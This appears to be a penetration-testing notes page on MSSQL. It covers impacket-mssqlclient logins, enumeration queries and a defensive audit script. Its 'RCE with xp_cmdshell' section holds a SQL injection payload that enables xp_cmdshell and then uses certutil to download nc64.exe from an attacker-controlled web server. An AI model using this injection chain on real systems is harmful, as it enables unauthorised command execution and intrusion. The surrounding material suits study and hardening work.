# MSSQL

## SQLCMD

A Windows built-in command-line tool that allows SQL queries to be run through the Windows command prompt or remotely from another machine.

## Impacket-MSSQLClient

Impacket includes a tool (impacket-mssqlclient) that can be used to connect to a Windows machine running MSSQL. Be sure to use the **-windows-auth** flag to authenticate with NTLM.

```bash
impacket-mssqlclient Administrator:Lab123@192.168.50.18 -windows-auth
```

## MSSQL Console Commands

When using an SQL Server command line tool like sqlcmd, we must submit our SQL statement ending with a semicolon followed by GO on a separate line. GO is a batch separator interpreted by the client tool, not a T-SQL statement, so when running the command remotely through a client that speaks TDS directly (such as impacket-mssqlclient) we omit it.

Show MSSQL version:

```sql
SELECT @@version;
```

List all available databases:

```sql
SELECT name FROM sys.databases;
```

List tables in a database:

```sql
SELECT * FROM tampdb.information_schema.tables;
```

List all elements in a table:

```sql
SELECT * FROM tampdb.dbo.users;
```

We must specify the schema (**dbo** by default) between the database and the table name, giving the three-part form database.schema.table.
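As an added example (not from the original notes), the enumeration queries above combined into one sqlcmd batch script; `tampdb` and its `users` table are the page's own example names, and the host name in the comment is a placeholder. Each batch is closed with `GO` as sqlcmd requires; when the same statements are sent through impacket-mssqlclient, drop the `GO` lines.

```sql
-- Added example: enumeration as a sqlcmd script
-- Run with: sqlcmd -S <host> -E -i enum.sql   (<host> is a placeholder)

-- Server version, the login we are connected as, and whether it is sysadmin
SELECT @@version AS version,
       SYSTEM_USER AS login_name,
       IS_SRVROLEMEMBER('sysadmin') AS is_sysadmin;
GO

-- User databases only: database_id 1-4 are master, tempdb, model and msdb
SELECT name, state_desc
FROM sys.databases
WHERE database_id > 4;
GO

-- Tables in tampdb, printed as the three-part name (database.schema.table)
-- that later queries need; this is why the schema must be given explicitly
SELECT TABLE_CATALOG + '.' + TABLE_SCHEMA + '.' + TABLE_NAME AS three_part_name
FROM tampdb.INFORMATION_SCHEMA.TABLES
WHERE TABLE_TYPE = 'BASE TABLE';
GO

-- Columns of the users table, so the final SELECT can be narrowed if needed
SELECT COLUMN_NAME, DATA_TYPE
FROM tampdb.INFORMATION_SCHEMA.COLUMNS
WHERE TABLE_SCHEMA = 'dbo' AND TABLE_NAME = 'users';
GO

-- Rows of the table, addressed with the full three-part name
SELECT * FROM tampdb.dbo.users;
GO
```

`-E` uses the current Windows login (integrated authentication); replace it with `-U`/`-P` for a SQL login. Filtering on `database_id > 4` hides the system databases, which is usually what you want when looking for application data.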

## RCE with xp\_cmdshell

The injection below runs in two steps. The first payload enables **xp\_cmdshell** through **sp\_configure**; because it is an advanced option, **show advanced options** has to be turned on first and **RECONFIGURE** applied after each change. The second payload calls **xp\_cmdshell** to fetch a file with **certutil**. A request arriving at the listening web server confirms that the command executed; if none arrives, the first step did not take effect.

{% code overflow="wrap" %}

```
1';EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE--
then
1';EXEC xp_cmdshell 'certutil -urlcache -f http://192.168.45.x/nc64.exe c:/windows/temp/nc64.exe';--
```

{% endcode %}
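From the defensive side, an added example (not part of the original notes) that audits and reverts the configuration the payload above changes. Nothing in it is page-specific: it uses only the `sp_configure` options already shown and the `sys.configurations`, `sys.server_principals` and `sys.server_role_members` catalog views that ship with SQL Server.

```sql
-- Added example: audit and revert the xp_cmdshell change.

-- 1. Current state. value_in_use = 1 means xp_cmdshell is callable right now;
--    value = 1 with value_in_use = 0 means it was set but RECONFIGURE never ran.
SELECT name, value, value_in_use
FROM sys.configurations
WHERE name IN ('show advanced options', 'xp_cmdshell');

-- 2. Who could have flipped it. sp_configure needs ALTER SETTINGS, which the
--    sysadmin and serveradmin roles hold implicitly. xp_cmdshell itself runs as
--    the SQL Server service account for sysadmins and as the configured proxy
--    account for everyone else, so an application login in sysadmin is the
--    condition that turns an injection into command execution.
SELECT p.name AS login_name, p.type_desc, r.name AS server_role
FROM sys.server_role_members AS m
JOIN sys.server_principals AS r ON r.principal_id = m.role_principal_id
JOIN sys.server_principals AS p ON p.principal_id = m.member_principal_id
WHERE r.name IN ('sysadmin', 'serveradmin');

-- 3. Disable xp_cmdshell again and hide the advanced options.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;
EXEC sp_configure 'show advanced options', 0;
RECONFIGURE;

-- 4. Confirm the change took effect.
SELECT name, value_in_use
FROM sys.configurations
WHERE name = 'xp_cmdshell';
```

Step 2 is the one that matters for prevention: the chain on this page only works because the login the web application uses can run `sp_configure`. A login that holds only database-level permissions on the application database cannot enable `xp_cmdshell` at all, and the query in step 2 lists exactly which logins still can.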
